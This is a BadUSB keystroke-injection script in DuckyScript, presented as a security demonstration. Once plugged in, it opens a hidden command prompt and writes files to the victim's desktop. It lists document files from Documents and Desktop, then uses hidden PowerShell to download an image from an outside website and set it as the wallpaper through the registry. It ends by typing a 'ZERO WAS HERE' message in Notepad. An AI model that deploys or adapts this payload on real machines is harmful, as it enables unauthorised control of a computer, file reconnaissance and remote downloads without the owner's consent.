REM BadUSB Demo: Open Terminal, Notepad, and type a message
ATTACKMODE HID STORAGE
DELAY 2000
REM Open File Explorer
WINDOWS e
DELAY 1000
REM Open Hidden Command Prompt
WINDOWS r
DELAY 500
STRING start /min cmd
ENTER
DELAY 1500
REM Create "Demo" directory and files in one reliable command
STRING mkdir "%USERPROFILE%\Desktop\Demo" 2>nul && echo Demo file created at %date% %time% > "%USERPROFILE%\Desktop\Demo\README.txt" && echo This is a security demonstration file. > "%USERPROFILE%\Desktop\Demo\demo.txt" && echo If you can read this, your system was accessed via HID device. > "%USERPROFILE%\Desktop\Demo\warning.txt"
ENTER
DELAY 1000
REM Search for common document types (globally usable)
STRING for /r "%USERPROFILE%\Documents" %f in (*.doc *.docx *.pdf *.txt) do @echo Found: %f >> "%USERPROFILE%\Desktop\Demo\file_list.txt"
ENTER
DELAY 1000
STRING for /r "%USERPROFILE%\Desktop" %f in (*.doc *.docx *.pdf *.txt) do @echo Found: %f >> "%USERPROFILE%\Desktop\Demo\file_list.txt"
ENTER
DELAY 1000
REM Change wallpaper to hacker skull (stealth version)
STRING powershell -WindowStyle Hidden -NoProfile -NonInteractive -Command "Invoke-WebRequest -Uri 'https://wallpapers.com/images/hd/black-skull-hacker-3i5cydng2l8h144o.jpg' -OutFile $env:USERPROFILE\Desktop\Demo\wallpaper.jpg; reg add 'HKCU\Control Panel\Desktop' /v Wallpaper /t REG_SZ /d $env:USERPROFILE\Desktop\Demo\wallpaper.jpg /f; RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters"
ENTER
DELAY 3000
REM Open Notepad
WINDOWS r
DELAY 500
STRING notepad
ENTER
DELAY 1500
REM Type simple hacker message in Notepad (replacing ASCII art)
STRING ZERO WAS HERE
ENTER
ENTER
DELAY 500
STRING never trust an open machine
ENTER
DELAY 500
STRING *** DEMO: Demo files have been created. This is a security demonstration. ***
ENTER
STRING To protect your data, always lock your machine and use strong passwords.
ENTER
STRING This was a demo. Next time, don't plug in random USB drives or borrow chargers!
ENTER